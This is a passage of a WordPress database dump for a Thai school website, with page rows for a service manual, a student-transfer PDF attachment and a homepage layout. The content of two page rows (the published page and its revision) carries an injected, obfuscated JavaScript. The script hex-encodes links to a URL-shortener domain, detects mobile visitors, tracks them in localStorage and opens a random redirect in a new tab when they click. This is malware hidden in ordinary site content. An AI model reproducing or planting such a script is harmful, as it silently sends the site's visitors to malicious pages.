os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คู่มือบริการ','','publish','closed','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-08-09 22:05:08','2024-08-09 15:05:08','',0,'http://pakhaeng.ssk.in.th/?page_id=810',0,'page','',0),
(811,1,'2024-08-09 22:05:01','2024-08-09 15:05:01','','คู่มือการขอย้ายออกนักเรียน','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%a2%e0%b9%89%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%ad%e0%b8%81%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80','','','2024-08-09 22:05:01','2024-08-09 15:05:01','',810,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf',0,'attachment','application/pdf',0),
(812,1,'2024-08-09 22:05:08','2024-08-09 15:05:08','<!-- wp:file {\"id\":811,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือการขอย้ายออกนักเรียน\"></object><a id=\"wp-block-file--media-d4f2f03a-5687-4318-a087-20514e9fd8af\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\">คู่มือการขอย้ายออกนักเรียน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d4f2f03a-5687-4318-a087-20514e9fd8af\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คู่มือบริการ','','inherit','closed','closed','','810-revision-v1','','','2024-08-09 22:05:08','2024-08-09 15:05:08','',810,'http://pakhaeng.ssk.in.th/?p=812',0,'revision','',0),
(813,1,'2024-08-09 22:05:34','2024-08-09 15:05:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 